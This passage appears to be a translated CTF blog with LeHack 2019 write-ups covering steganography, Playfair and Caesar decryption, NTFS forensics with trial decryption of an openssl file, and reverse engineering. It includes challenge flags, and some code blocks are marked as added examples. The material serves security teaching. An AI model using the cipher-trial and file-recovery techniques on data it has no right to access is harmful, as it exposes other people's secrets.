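# Constructed sample: a 16x8 greyscale ramp carrying a 16-byte message
# (16 * 8 = 128 pixels, exactly 128 payload bits).
WIDTH, HEIGHT, MAXVAL = 16, 8, 255
COVER = [(x * 16 + y * 2) % 256 for y in range(HEIGHT) for x in range(WIDTH)]
HIDDEN = b"lh_{constructed}"
SAMPLE_PGM = to_p2(WIDTH, HEIGHT, MAXVAL, embed_lsb(COVER, HIDDEN))


def recover(pgm_text: str) -> bytes:
    """Parse a P2 image and return the bytes carried by its pixel LSBs."""
    _, _, _, pixels = parse_p2(pgm_text)
    return lsb_bytes(pixels)


if __name__ == "__main__":
    print(recover(SAMPLE_PGM))  # b'lh_{constructed}'
```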
<p>We then get the flag, repeated over and over: <code>lh_{EtMy4WiQofuCeMEf8672}</code>.</p>
<h2>LeHack 19 - Au service de la France #1</h2>
<p><em>2019-07-07 - nlegall - <a href="/lehack-19-au-service-de-la-france-1.html">lehack-19-au-service-de-la-france-1.html</a></em></p>
<p><em>File : none</em></p>
<div class="highlight"><pre><span></span><code>Au service de la france #1
30 Points
Au service de la france - partie 1
contexte
Vous êtes Jean-Michel, barbouze aguerrie de notre cher Pays. Vu que vous n'êtes pas très doué en langues étrangères, vous vous êtes spécialisé en informatique. Vous êtes devenu le Kev (Mitnick, pas Adams) de l'agence, et aujourd'hui le travail hardu, c'est pour vous...
a propos
Ce challenge est le premier d'une série de quatre challenges, qui vous permettra de récupérer suffisamment d'information pour contrer une attaque russe contre la France! Chaque challenge peut se faire de manière indépendante. Cependant, pour inciter les gens à réaliser les challenges dans l'ordre, chaque résolution du challenge numéro N vous donnera un indice pour résoudre le challenge N+1.
disclaimer
Ce challenge est une pure fiction. Toute ressemblance avec des gens et/ou entités a pour but d'apporter un peu plus de réalisme avec une dose d'humour(troll) au challenges principalement basé sur les ragots. Aucune atteinte à ces personnes/entités n'a donc été voulue, et l'auteur s'excuse par avance.
challenge
Le téléphone sonne de manière répétée depuis 10 minutes... Pourtant, il est 5h du matin, vous êtes encore complètement grisé du pot de départ de la veille... Après s'être levé et décrocher le combiné, moment qui vous a paru être une éternité, vous entendez une voix robotique : "- Bon..jour mon..sieur Hulot. Le pi..geon a de..co..llé." Pas le temps de dire "allo?" que ça a raccroché... Cependant, vous savez de qui il s'agit, c'est votre employeur! et ce genre de message ça signifie pas bon... Vous enfilez votre peignoir, et ouvrez votre boîte mail anonymisée gmail. Dedans, vous trouvez le message suivant:
''' To: jeanmichel78@gmail.com From: juliettedu38@gmail.com Objet: Hey cousin, vas mater ma nouvelle vidéo!
Salut cousin,
j'ai sorti une nouvelle vidéo. Faudrait vraiment que tu la regarde!
je te fais plein de bisous Juliette
Comme tu m'a appris la dernière fois qu'on s'est vu, ma signature pour dire que c'est bien moi! :
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
encore des bisous! '''
</code></pre></div>
<p>Well, as is often the case with base64 encoding, the two <code>=</code> signs at the end of the string give it away. So we start by decoding this string:</p>
<div class="highlight"><pre><span></span><code>$ <span class="nb">echo</span> <span class="s2">"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"</span> <span class="p">|</span> base64 -d
<span class="o">=======</span> BEGIN ENCRYPTED PLAYFAIR MESSAGE ID:83358448408710928711 <span class="o">=======</span>
<span class="nv">RYPXVFNPVXEAVCZIVBDHTZVBDOAVDHCFRXXFPCTMTVRMGBEVZRTKCAWHNPCTZHCFTCTMTVLTTVEAYBVISFGCCAOEVEKVRZNPSYZSCENTQTCTTCRZPGCYKPRZNTFZPGBKYBIBPNHZNZEGPCEAUZQIEATLYBDHTCCBKHVTYBVETLZGTVTVTCZYWHGPTRTCCACIVEKVEPEKZTYGGXTSXFPCEAKOCYHVLSEGKVTMDHZOVEDHQVOTEVWHKPVCCTREVTGEZNPNPCEALSQYBGTVFZCPVCSENPGDEXTNEPZGNTNREAIBQIHBDOAVDHCSDHAVOTPNQTIHZSXFPCIPSQPERSEAIBTVBFIPTVSVPEEPKEHXSQSRODBKPIGDAMSNTLZGTVKVVXPQEPZFVQDHAMRNVCOTIBKNHSNLEVVCIBIPBKQIHZTVBFIPTVAQVETLZGTVGZKPXTBTPKIBEAXGKTEAUZPCCFTSTPZFAQCTGEPEKEFYQMKRKI</span>
<span class="o">======================</span>END <span class="nv">MESSAGE</span><span class="o">=======================</span>
</code></pre></div>
<p>This gives us a new encoded message, but we also have the name of the cipher used: <a href="https://en.wikipedia.org/wiki/Playfair_cipher"><code>PLAYFAIR</code></a>. Online decoders are easy to find. We can use this one, which brute-forces the string: https://bionsgadgets.appspot.com/ww_forms/playfair_ph_web_worker3.html.</p>
<div class="highlight"><pre><span></span><code>ahmichelcontentdevousrevoirnousxsomxmespresquecertainsquelesrusxsespreparentuneofxfensivecontrelafranceapressetreinfiltreauseindundeleurbatimentdupontapunousenvoyerunecapturereseauquiestsensexecontenirsuffisamxmentdinformationspourdecouvrircequilenestveritablementmalheureusementceluiciaetetueavantdepouvoirnousfournirleprogramxmepermettantderecuperercetteinformationdepuislacaptureoncomptesurvouslavenirdelafranceendependpourrecupererlecaptureutilisezlidentifiantdumesxsagesurlesitetinyuploadx
score of plaintext is 1264.05 on trial: 26375, fudge factor: 0.15, % accept: 6.97, Doppleschach score: 0.62
Key: UYFGHZASTRBNCEVWLMPQDKXIO
(trial: 2000000 % accepted: 0.12 decrementing, new cycle len: 19) worker: 2
</code></pre></div>
<p>We wait for it to finish decoding and there it is, our message. Adding spaces and punctuation and correcting the few mistakes makes it more readable:</p>
<div class="highlight"><pre><span></span><code>ah michel, good to see you again. we are almost certain that the Russians are preparing an offensive against France. After infiltrating one of their buildings, Dupont managed to send us a network capture that is supposed to contain enough information to find out what is really going on. Unfortunately, he was killed before he could give us the program needed to recover that information from the capture. We are counting on you. The future of France depends on it. To retrieve the capture, use the message ID on the tinyupload site.
</code></pre></div>
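To check the online brute-forcer's result offline, here is an added Playfair decryptor (not part of the original post) that applies the reported key square to the ciphertext from the post. The square is filled row by row from the 25-letter key with J folded into I, and the same-row, same-column and rectangle rules are the standard Playfair ones; the round trip through the encrypt direction confirms the implementation is consistent.

```python
#!/usr/bin/env python3
"""Added example (not from the original post): verify the Playfair key the
online tool reported by decrypting the message from the post locally."""

# Key square reported by the brute-forcer in the post, row by row (25 letters, no J).
KEY = "UYFGHZASTRBNCEVWLMPQDKXIO"

# Ciphertext from the post (body of the base64-decoded "ENCRYPTED PLAYFAIR MESSAGE").
CIPHERTEXT = "RYPXVFNPVXEAVCZIVBDHTZVBDOAVDHCFRXXFPCTMTVRMGBEVZRTKCAWHNPCTZHCFTCTMTVLTTVEAYBVISFGCCAOEVEKVRZNPSYZSCENTQTCTTCRZPGCYKPRZNTFZPGBKYBIBPNHZNZEGPCEAUZQIEATLYBDHTCCBKHVTYBVETLZGTVTVTCZYWHGPTRTCCACIVEKVEPEKZTYGGXTSXFPCEAKOCYHVLSEGKVTMDHZOVEDHQVOTEVWHKPVCCTREVTGEZNPNPCEALSQYBGTVFZCPVCSENPGDEXTNEPZGNTNREAIBQIHBDOAVDHCSDHAVOTPNQTIHZSXFPCIPSQPERSEAIBTVBFIPTVSVPEEPKEHXSQSRODBKPIGDAMSNTLZGTVKVVXPQEPZFVQDHAMRNVCOTIBKNHSNLEVVCIBIPBKQIHZTVBFIPTVAQVETLZGTVGZKPXTBTPKIBEAXGKTEAUZPCCFTSTPZFAQCTGEPEKEFYQMKRKI"

ALPHABET = "ABCDEFGHIKLMNOPQRSTUVWXYZ"  # 25 letters, J folded into I


def build_square(key: str):
    """Return the 5x5 square as a 25-char string and a letter -> (row, col) map.
    Letters of the key come first (duplicates dropped), then the rest of the alphabet."""
    square = ""
    for ch in key.upper().replace("J", "I") + ALPHABET:
        if ch in ALPHABET and ch not in square:
            square += ch
    if len(square) != 25:
        raise ValueError("key must yield 25 distinct letters")
    return square, {ch: divmod(i, 5) for i, ch in enumerate(square)}


def _transform(text: str, key: str, shift: int) -> str:
    """Apply the Playfair digraph rules; shift=+1 encrypts, shift=-1 decrypts."""
    square, pos = build_square(key)
    text = "".join(c for c in text.upper().replace("J", "I") if c in ALPHABET)
    if len(text) % 2:
        raise ValueError("Playfair text must contain an even number of letters")
    out = []
    for a, b in zip(text[0::2], text[1::2]):
        if a == b:
            raise ValueError("doubled letter in a digraph; insert a filler first")
        (ra, ca), (rb, cb) = pos[a], pos[b]
        if ra == rb:            # same row: move along the row (right to encrypt, left to decrypt)
            out.append(square[ra * 5 + (ca + shift) % 5])
            out.append(square[rb * 5 + (cb + shift) % 5])
        elif ca == cb:          # same column: move along the column (down / up)
            out.append(square[((ra + shift) % 5) * 5 + ca])
            out.append(square[((rb + shift) % 5) * 5 + cb])
        else:                   # rectangle: each letter takes the other's column
            out.append(square[ra * 5 + cb])
            out.append(square[rb * 5 + ca])
    return "".join(out)


def playfair_decrypt(ciphertext: str, key: str) -> str:
    return _transform(ciphertext, key, -1).lower()


def playfair_encrypt(plaintext: str, key: str) -> str:
    """Encrypt an already-prepared plaintext (no doubled letters inside a digraph).
    Playfair inserts a filler such as X between repeated letters, which is why the
    post's plaintext reads 'nousxsomxmes' for 'nous sommes'."""
    return _transform(plaintext, key, 1)


if __name__ == "__main__":
    print(playfair_decrypt(CIPHERTEXT, KEY))
```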
<p>We can try uploading a file to see how the URL is built on http://s000.tinyupload.com/. That gives us the following link: http://s000.tinyupload.com/index.php?file_id=83358448408710928711. We fetch the file and open it:</p>
<div class="highlight"><pre><span></span><code>Well done, you solved the first challenge! After entering the flag, feel free to carry on, but I warn you, it will be harder! For the rest of the story, go to the page of the challenge "au service de la france - partie 2".
Hint for the next one: The flag is inside a protocol that we are not used to seeing.
here is the flag: LH{awmerbx2cft4u5uqgnde}
</code></pre></div>
<p>We therefore have information for the next chapter, and the flag: <code>LH{awmerbx2cft4u5uqgnde}</code>.</p>
<h2>LeHack 19 - double cesar</h2>
<p><em>2019-07-07 - nlegall - <a href="/lehack-19-double-cesar.html">lehack-19-double-cesar.html</a></em></p>
<div class="highlight"><pre><span></span><code>double cesar
5 Points
A friend set me a challenge on IRC. According to him, he created an encryption algorithm that is super hard to break, based on two Caesar ciphers applied one after the other. He explained that it could only ever be broken because Julius Caesar had not thought of chaining several of them. Anyway, he sent me this: "oqemdradftqiuzfdabradf" and told me "go on, you won't find what I put in there". And I admit that trying every combination of two Caesar ciphers looks too complicated to me. Can you help me crack his code?
</code></pre></div>
<p>The string to decode is therefore <code>oqemdradftqiuzfdabradf</code>. The Caesar cipher is originally a shift of 3 letters:</p>
<ul>
<li>A -> D</li>
<li>B -> E</li>
<li>C -> F</li>
<li>...</li>
</ul>
<p>Breaking a double Caesar cipher then amounts to finding the total shift that was applied. We can use this <a href="https://www.dcode.fr/caesar-cipher">site</a>. It decodes by brute force, displaying the shifts from 1 to 25, i.e. every possible combination.</p>
<p>It is also possible to do it with a Python script:</p>
<div class="highlight"><pre><span></span><code><span class="kn">from</span> <span class="nn">sys</span> <span class="kn">import</span> <span class="n">argv</span>
<span class="n">message</span> <span class="o">=</span> <span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span>
<span class="n">LETTERS</span> <span class="o">=</span> <span class="s1">'ABCDEFGHIJKLMNOPQRSTUVWXYZ'</span>
<span class="n">letters</span> <span class="o">=</span> <span class="s1">'abcdefghijklmnopqrstuvwxyz'</span>
<span class="k">for</span> <span class="n">key</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">26</span><span class="p">):</span>
<span class="n">translated</span> <span class="o">=</span> <span class="s1">''</span>
<span class="k">for</span> <span class="n">letter</span> <span class="ow">in</span> <span class="n">message</span><span class="p">:</span>
<span class="k">if</span> <span class="n">letter</span><span class="o">.</span><span class="n">isupper</span><span class="p">():</span>
<span class="n">current_alphabet</span> <span class="o">=</span> <span class="n">LETTERS</span>
<span class="k">else</span><span class="p">:</span>
<span class="n">current_alphabet</span> <span class="o">=</span> <span class="n">letters</span>
<span class="n">num</span> <span class="o">=</span> <span class="n">current_alphabet</span><span class="o">.</span><span class="n">find</span><span class="p">(</span><span class="n">letter</span><span class="p">)</span>
<span class="n">num</span> <span class="o">=</span> <span class="n">num</span> <span class="o">-</span> <span class="n">key</span>
<span class="k">if</span> <span class="n">num</span> <span class="o"><</span> <span class="mi">0</span><span class="p">:</span>
<span class="n">num</span> <span class="o">=</span> <span class="n">num</span> <span class="o">+</span> <span class="nb">len</span><span class="p">(</span><span class="n">current_alphabet</span><span class="p">)</span>
<span class="n">translated</span> <span class="o">+=</span> <span class="n">current_alphabet</span><span class="p">[</span><span class="n">num</span><span class="p">]</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'Key </span><span class="si">%s</span><span class="s1">: </span><span class="si">%s</span><span class="s1">'</span> <span class="o">%</span> <span class="p">(</span><span class="n">key</span><span class="p">,</span> <span class="n">translated</span><span class="p">))</span>
</code></pre></div>
<p>We can then call our script with the message to decode as its argument:</p>
<div class="highlight"><pre><span></span><code>$ python rot.py oqemdradftqiuzfdabradf
Key <span class="m">0</span>: oqemdradftqiuzfdabradf
Key <span class="m">1</span>: npdlcqzcesphtyeczaqzce
<span class="o">[</span>...<span class="o">]</span>
Key <span class="m">12</span>: cesarforthewintropfort
Key <span class="m">13</span>: bdrzqenqsgdvhmsqnoenqs
</code></pre></div>
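Why the friend's scheme gains nothing, as an added example that is not part of the original post: two shifts compose into a single shift of the sum modulo 26, so all 26 x 26 key pairs produce only 26 distinct ciphertexts, and the brute force above still needs at most 26 tries. The shift function and the brute force are my own code; the challenge string is the one from the post.

```python
#!/usr/bin/env python3
"""Added example (not from the original post): chaining two Caesar
ciphers is still a Caesar cipher, checked on the challenge string."""
import string

CHALLENGE = "oqemdradftqiuzfdabradf"  # ciphertext from the challenge text


def caesar(text: str, key: int) -> str:
    """Shift every ASCII letter by `key` positions (a negative key undoes
    a shift); case is preserved and non-letters pass through unchanged."""
    out = []
    for ch in text:
        if ch.isascii() and ch.isalpha():
            base = ord("A") if ch.isupper() else ord("a")
            out.append(chr(base + (ord(ch) - base + key) % 26))
        else:
            out.append(ch)
    return "".join(out)


def double_caesar(text: str, k1: int, k2: int) -> str:
    """The friend's scheme: two Caesar shifts applied one after the other."""
    return caesar(caesar(text, k1), k2)


def distinct_double_ciphertexts(plaintext: str) -> int:
    """How many different ciphertexts all 26 * 26 key pairs can produce."""
    return len({double_caesar(plaintext, k1, k2)
                for k1 in range(26) for k2 in range(26)})


def brute_force(ciphertext: str) -> dict:
    """Every candidate plaintext, indexed by the single equivalent shift."""
    return {k: caesar(ciphertext, -k) for k in range(26)}


if __name__ == "__main__":
    for k, candidate in brute_force(CHALLENGE).items():
        print(f"Key {k:2d}: {candidate}")
    print(distinct_double_ciphertexts("cesarforthewintropfort"))  # 26
```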
<p>We then look for a coherent message among all the candidates. It appears at a rotation of 12 letters, which gives the decoded message: <code>cesarforthewintropfort</code>.</p>
<h2>LeHack 19 - #ECSC Amok</h2>
<p><em>2019-07-07 - nlegall - <a href="/lehack-19-ecsc-amok.html">lehack-19-ecsc-amok.html</a></em></p>
<p><em>File : <a href="https://blog.nlegall.fr/files/lehack/19/103_spx.zip">103_spx.zip</a></em></p>
<div class="highlight"><pre><span></span><code>ECSC# 103_spx
80 Points
you do forensics? then you don't need a description, nah!
Url: https://static.wargame.rocks/103_spx.zip
</code></pre></div>
<p>Well, there is not much text to help us. So we fetch the archive and extract its contents.</p>
<div class="highlight"><pre><span></span><code>$ unzip 103_spx.zip
Archive: 103_spx.zip
inflating: USB_a_analyser
</code></pre></div>
<p>This gives us a single file. The <code>file</code> command tells us its type and how we will be able to work with it:</p>
<div class="highlight"><pre><span></span><code>$ file USB_a_analyser
USB_a_analyser: DOS/MBR boot sector, code offset 0x52+2, OEM-ID <span class="s2">"NTFS "</span>, sectors/cluster <span class="m">8</span>, Media descriptor 0xf8, sectors/track <span class="m">62</span>, heads <span class="m">8</span>, dos < <span class="m">4</span>.0 BootSector <span class="o">(</span>0x80<span class="o">)</span>, FAT <span class="o">(</span>1Y bit by descriptor<span class="o">)</span><span class="p">;</span> NTFS, sectors/track <span class="m">62</span>, sectors <span class="m">507903</span>, <span class="nv">$MFT</span> start cluster <span class="m">4</span>, <span class="nv">$MFTMirror</span> start cluster <span class="m">31743</span>, bytes/RecordSegment <span class="m">2</span>^<span class="o">(</span>-1*246<span class="o">)</span>, clusters/index block <span class="m">1</span>, serial number 06d84ef355f47cf91
</code></pre></div>
<p>We can therefore mount this file as a drive (read-only is optional but avoids altering the data) and look at its contents:</p>
<div class="highlight"><pre><span></span><code><span class="c1"># mount read-only so as not to alter the data</span>
$ mount USB_a_analyser forensic -o ro
$ <span class="nb">cd</span> forensic
$ ls -alh
total 101K
drwxrwxrwx <span class="m">1</span> root root <span class="m">4</span>.0K Jul <span class="m">6</span> <span class="m">14</span>:14 .
drwxrwxrwt <span class="m">22</span> root root <span class="m">4</span>.0K Jul <span class="m">14</span> <span class="m">21</span>:19 ..
-rwxrwxrwx <span class="m">1</span> root root <span class="m">577</span> Jul <span class="m">6</span> <span class="m">14</span>:10 message.txt
-rwxrwxrwx <span class="m">1</span> root root 15K Jul <span class="m">6</span> <span class="m">01</span>:46 Peugeot103SPXFILI.jpg
drwxrwxrwx <span class="m">1</span> root root <span class="m">8</span>.0K Jul <span class="m">6</span> <span class="m">14</span>:12 <span class="s1">'Peugeot 103 SPX : tous les modèles de 1987 à 2003 | Actualités de la mobylette par Mobylette Mag_files'</span>
-rwxrwxrwx <span class="m">1</span> root root 68K Jul <span class="m">6</span> <span class="m">14</span>:12 <span class="s1">'Peugeot 103 SPX : tous les modèles de 1987 à 2003 | Actualités de la mobylette par Mobylette Mag.html'</span>
drwxrwxrwx <span class="m">1</span> root root <span class="m">0</span> Jul <span class="m">6</span> <span class="m">14</span>:14 .Trash-1000
</code></pre></div>
<p>We notice a <code>message.txt</code> file:</p>
<div class="highlight"><pre><span></span><code>$ cat message.txt
Si un jour je relis ce message, le mot de passe utilisé pour chiffrer mon plus grand secret était <span class="s2">"vgrohhfyek0wkfi5fv13anexapy3sso6"</span> et j<span class="s1">'avais utilisé openssl.</span>
<span class="s1">En revanche, j'</span>ai effacé par erreur le fichier contenant mon plus grand secret <span class="o">(</span>voir s<span class="s1">'il existe des techniques de la mort pour le retrouver mon fichier secret.xz sha256(0fb08681c2f8db4d3c127c4c721018416cc9f9b369d5f5f9cf420b89ee5dfe4e) de 136 octets) et de toute façon, impossible de me rappeler de l'</span>algo utilisé -_- <span class="o">(</span>donc si je le retrouve... il faudra aussi retrouver l<span class="err">'</span>algo pour utiliser ce mot de passe<span class="o">)</span>.
</code></pre></div>
<p>It gives us several pieces of information:</p>
<ul>
<li>The password used to encrypt the file we are looking for. We do not have the algorithm, however.</li>
<li>The name of the file to find.</li>
</ul>
<div class="highlight"><pre><span></span><code>$ ls .Trash-1000/files -alh
total 201K
drwxrwxrwx <span class="m">1</span> root root <span class="m">4</span>.0K Jul <span class="m">6</span> <span class="m">14</span>:14 .
drwxrwxrwx <span class="m">1</span> root root <span class="m">0</span> Jul <span class="m">6</span> <span class="m">14</span>:14 ..
drwxrwxrwx <span class="m">1</span> root root <span class="m">4</span>.0K Jul <span class="m">6</span> <span class="m">14</span>:13 <span class="s2">"CERT-FR – Centre gouvernemental de veille, d'alerte et de réponse aux attaques informatiques_files"</span>
-rwxrwxrwx <span class="m">1</span> root root 33K Jul <span class="m">6</span> <span class="m">14</span>:13 <span class="s2">"CERT-FR – Centre gouvernemental de veille, d'alerte et de réponse aux attaques informatiques.html"</span>
drwxrwxrwx <span class="m">1</span> root root <span class="m">4</span>.0K Jul <span class="m">6</span> <span class="m">14</span>:12 <span class="s1">'Peugeot 103 — Wikipédia_files'</span>
-rwxrwxrwx <span class="m">1</span> root root 151K Jul <span class="m">6</span> <span class="m">14</span>:12 <span class="s1">'Peugeot 103 — Wikipédia.html'</span>
-rwxrwxrwx <span class="m">1</span> root root <span class="m">136</span> Jul <span class="m">6</span> <span class="m">14</span>:09 secret.xz
</code></pre></div>
<p>We can check the file's hash against the one given in the message:</p>
<div class="highlight"><pre><span></span><code>$ sha256sum .Trash-1000/files/secret.xz
0fb08681c2f8db4d3c127c4c721018416cc9f9b369d5f5f9cf420b89ee5dfe4e .Trash-1000/files/secret.xz
</code></pre></div>
<p>So we do have our file. We copy it and extract its contents:</p>
<div class="highlight"><pre><span></span><code>$ xz -d secret.xz
$ cat secret
Salted__��k��.�@���>�#��z���
�S�n���!��O�ND�5����k�b<span class="o">=</span>��N-�㖿�,��s�٪#
</code></pre></div>
<p>The message is indeed encrypted and salted. It is possible to try every algorithm offered by the <code>openssl</code> command by hand, but that would take a while. So we can use scripts that test them for us:</p>
<div class="highlight"><pre><span></span><code><span class="c1"># git clone https://github.com/penthium2/salt_pepper.git .</span>
$ ./salt_pepper/salt-pepper -f secret -p <span class="s2">"vgrohhfyek0wkfi5fv13anexapy3sso6"</span>
$ cat FLAGS/*
flag : lh_6c31ba64e522b5f9326b7bee0abef6547f60d214
<span class="o">[</span>...<span class="o">]</span>
</code></pre></div>
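What such a script has to enumerate, as an added example that is not part of the original post or of salt_pepper: the <code>openssl enc</code> file layout (the 8-byte <code>Salted__</code> magic seen in the <code>cat</code> output, followed by the 8-byte salt) and the legacy EVP_BytesToKey derivation that turns the password and salt into a key and IV. The digest depends on the OpenSSL version that wrote the file (MD5 before 1.1.0, SHA-256 from 1.1.0 on) and the key and IV lengths depend on the cipher, so every (digest, cipher) pair is a separate candidate. The blob and password below are constructed; actually trying a candidate still needs a cipher implementation such as <code>openssl enc -d</code>.

```python
#!/usr/bin/env python3
"""Added example (not from the original post): parse an `openssl enc`
"Salted__" blob and derive the candidate key/IV pairs a brute-forcer tries."""
import hashlib

MAGIC = b"Salted__"

# (key length, IV length) in bytes for a few `openssl enc` ciphers; the blob
# itself does not record which cipher was used, hence the trial of each one.
CIPHERS = {
    "aes-128-cbc": (16, 16),
    "aes-256-cbc": (32, 16),
    "des-ede3-cbc": (24, 8),
    "bf-cbc": (16, 8),
}
# `openssl enc` hashed the password with MD5 before 1.1.0 and SHA-256 since.
DIGESTS = ("md5", "sha256")


def parse_salted(blob: bytes):
    """Split an enc output into (salt, ciphertext); raise if the magic is missing."""
    if len(blob) < 16 or not blob.startswith(MAGIC):
        raise ValueError("not an OpenSSL 'Salted__' file")
    return blob[8:16], blob[16:]


def evp_bytes_to_key(password: bytes, salt: bytes, key_len: int, iv_len: int,
                     digest: str = "md5", count: int = 1):
    """Legacy OpenSSL EVP_BytesToKey: D_i = H^count(D_{i-1} || password || salt),
    blocks concatenated until key_len + iv_len bytes are available.
    With count=1 (the `openssl enc` default when -pbkdf2/-iter are not given)
    each block costs a single hash, which is why guessing passwords against
    such files is cheap; -pbkdf2 with a high -iter is the modern setting."""
    if len(salt) != 8:
        raise ValueError("salt must be 8 bytes")
    material, block = b"", b""
    while len(material) < key_len + iv_len:
        block = hashlib.new(digest, block + password + salt).digest()
        for _ in range(count - 1):
            block = hashlib.new(digest, block).digest()
        material += block
    return material[:key_len], material[key_len:key_len + iv_len]


def candidate_keys(password: bytes, salt: bytes):
    """Every (digest, cipher) -> (key, iv) combination worth trying on the blob."""
    return {(d, c): evp_bytes_to_key(password, salt, klen, ivlen, d)
            for d in DIGESTS for c, (klen, ivlen) in CIPHERS.items()}


# Constructed sample: fixed salt, 32 dummy ciphertext bytes, made-up password.
SAMPLE_SALT = bytes.fromhex("0011223344556677")
SAMPLE_BLOB = MAGIC + SAMPLE_SALT + bytes(range(32))
SAMPLE_PASSWORD = b"constructed-password"

if __name__ == "__main__":
    salt, body = parse_salted(SAMPLE_BLOB)
    for (digest, cipher), (key, iv) in candidate_keys(SAMPLE_PASSWORD, salt).items():
        print(f"{digest:6} {cipher:12} key={key.hex()} iv={iv.hex()}")
```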
<p>And there we go :). Our flag is displayed: <code>lh_6c31ba64e522b5f9326b7bee0abef6547f60d214</code>. The cipher used is </p>
<h2>LeHack 19 - #ECSC StegCryptoDIY #1</h2>
<p><em>2019-07-07 - nlegall - <a href="/lehack-19-ecsc-stegcryptodiy-1.html">lehack-19-ecsc-stegcryptodiy-1.html</a></em></p>
<p><em>File : <a href="https://blog.nlegall.fr/files/lehack/19/leHACK19_chall.png">leHACK19_chall.png</a></em></p>
<div class="highlight"><pre><span></span><code>#ECSC StegCryptoDIY #1
30 Points
As everyone remembers, a few weeks ago during the ECSC qualifiers Dumb and Dumby exchanged messages using a new cryptosystem based on the FACT and DLP problems: CryptoDIY. Except they have apparently changed their system!
Apparently the crypto parameters are hidden in this file; it is up to you to find them.
Url: https://static.wargame.rocks/leHACK19_chall.png
</code></pre></div>
<p>As is often the case, the <code>strings</code> command can easily point us in the right direction. In our case we get:</p>
<div class="highlight"><pre><span></span><code>$ strings leHACK19_chall.png
IHDR
IDATx
<span class="nv">H4PB</span><span class="o">=</span>
0C<@
<span class="o">[</span>...<span class="o">]</span>
-*36,
gKyv
@duMBTiA9IDExNzU1MDY4OTQ0MTQyOTY5NDk4NzQzMjQ1OTg0NzYxMTgxMzI1NjA1MzA0NjI1Mjg2OTU4NzIxMzkxNzY2MDkxMjgzMTMyMzk4NDM3NjQ1MDM4MzQ5Nzc1ODk4OTIzNDY1MzMxMjYwMzA4MDY0NjExMTY3OTI2MTg3Mzk5Mzg0NzIzMzYwOTQxODgzNzMyMTc0OTAxNjY2ODAzICxnMSA9IDM4MDg4MTk1MDU1NjQ5OTk1NDUyNTI2MjM2MzExOTI1MDMyMTIxODY1OTgwODg1NTUzNDM3MzgxMTExNjUzODI2MjM0MjE3MjAxMTk4Mzc1NDQ2NTgxNzM4MjI0NjE4MzQwNzYzNDc3OTUxNTkzNjY1OTMxNzc2NjkwNTg3MDUwODcyNjY4OTg0NDQ4MTg5MjY2Njg1ODQ1MTksIGcyID0gODcyMTc4NzQwMDMyNzc4Mzc0ODAxNDg0OTAzNzYyNjAzOTM5NzgwNzYxMjM3MjgwNDAxNjY0MzY1MzA0NzU3NTk3NjAwOTgyNzAwMzQ0Nzc3ODg2MTI2MjAzNjc1MjMyNjgyNzYxMzA3ODM0NjIyNTE5MjU4MTcwODI0MDgyMDMyNTg2NzY1ODc0MjA3ODY5NDQ0NTY3Nzg3NyBJIHVzZSB0aGlzIGZ1bmN0b25zIGZvciBlbmNpcGhlcmluZyBvdXIgc2tleSA6IGVuY2lwaGVyKGludC5mcm9tX2J5dGVzKHNrZXksJ2JpZycpLGcxLGcyLE4pIHdpdGggZGVmIGVuY2lwaGVyKG0sZzEsZzIsTik6IHMxPXJhbmRvbS5yYW5kcmFuZ2UoMioqMTI3LDIqKjEyOCkgczI9cmFuZG9tLnJhbmRyYW5nZSgyKioxMjcsMioqMTI4KSByZXR1cm4gKG0qcG93KGcxLHMxLE4pKSVOLCAobSpwb3coZzIsczIsTikpJU4gYW5kIGhlcmUgaXMgYSBmbGFnOiBsZWhhY2syMDE5e2FlZjk1NTZhNTc1Y2M5ZGU4ZmM5NjA5YmQwMzRkNjNmZTBhMDE0NzBlYjQwMTM3ODI1M2Y3MjNiYmM1Y2MxNmN9
IEND
</code></pre></div>
<p>Notice in particular the second-to-last line. It is a base64-encoded string. However, the <code>@</code> character has to be removed, since it is not part of that encoding:</p>
<div class="highlight"><pre><span></span><code>$ strings leHACK19_chall.png <span class="p">|</span> grep <span class="s1">'@du'</span> <span class="p">|</span> sed <span class="s1">'s/@//'</span> <span class="p">|</span> base64 -d
v�N <span class="o">=</span> <span class="m">11755068944142969498743245984761181325605304625286958721391766091283132398437645038349775898923465331260308064611167926187399384723360941883732174901666803</span> ,g1 <span class="o">=</span> <span class="m">3808819505564999545252623631192503212186598088555343738111165382623421720119837544658173822461834076347795159366593177669058705087266898444818926668584519</span>, <span class="nv">g2</span> <span class="o">=</span> <span class="m">8721787400327783748014849037626039397807612372804016643653047575976009827003447778861262036752326827613078346225192581708240820325867658742078694445677877</span> I use this functons <span class="k">for</span> enciphering our skey : encipher<span class="o">(</span>int.from_bytes<span class="o">(</span>skey,<span class="s1">'big'</span><span class="o">)</span>,g1,g2,N<span class="o">)</span> with def encipher<span class="o">(</span>m,g1,g2,N<span class="o">)</span>: <span class="nv">s1</span><span class="o">=</span>random.randrange<span class="o">(</span><span class="m">2</span>**127,2**128<span class="o">)</span> <span class="nv">s2</span><span class="o">=</span>random.randrange<span class="o">(</span><span class="m">2</span>**127,2**128<span class="o">)</span> <span class="k">return</span> <span class="o">(</span>m*pow<span class="o">(</span>g1,s1,N<span class="o">))</span>%N, <span class="o">(</span>m*pow<span class="o">(</span>g2,s2,N<span class="o">))</span>%N and here is a flag: lehack2019<span class="o">{</span>aef9556a575cc9de8fc9609bd034d63fe0a01470eb401378253f723bbc5cc16c<span class="o">}</span>
</code></pre></div>
<p>We then get what looks like code (which will be useful later ;) ) along with our flag: <code>lehack2019{aef9556a575cc9de8fc9609bd034d63fe0a01470eb401378253f723bbc5cc16c}</code>.</p>
<h2>LeHack 19 - Gladiator</h2>
<p><em>2019-07-07 - nlegall - <a href="/lehack-19-gladiator.html">lehack-19-gladiator.html</a></em></p>
<p><em>File : <a href="https://blog.nlegall.fr/files/lehack/19/gladiator">gladiator</a></em></p>
<p>This challenge comes as a binary. It offers a fighting game:</p>
<div class="highlight"><pre><span></span><code>Welcome Gladiator !
Please select a character :
1 - Berserker (attack : 20, shield: 5)
2 - Guardian (attack: 10, shield: 10)
</code></pre></div>
<p>So we try the game several times, without success. We can win, lose or draw; the flag refuses to show.</p>
<p>We therefore start our analysis with IDA. We can see functions whose names are a single letter, so that is where we begin. We can generate pseudo-code for each of them to make them easier to understand.</p>
<p>When we reach function <code>X</code>, we notice from the pseudo-code that it closely resembles the <code>Berserker</code> structure:</p>
<p><img alt="glad_fonction_asm" src="https://blog.nlegall.fr/images/glad_fonction_asm.png"></p>
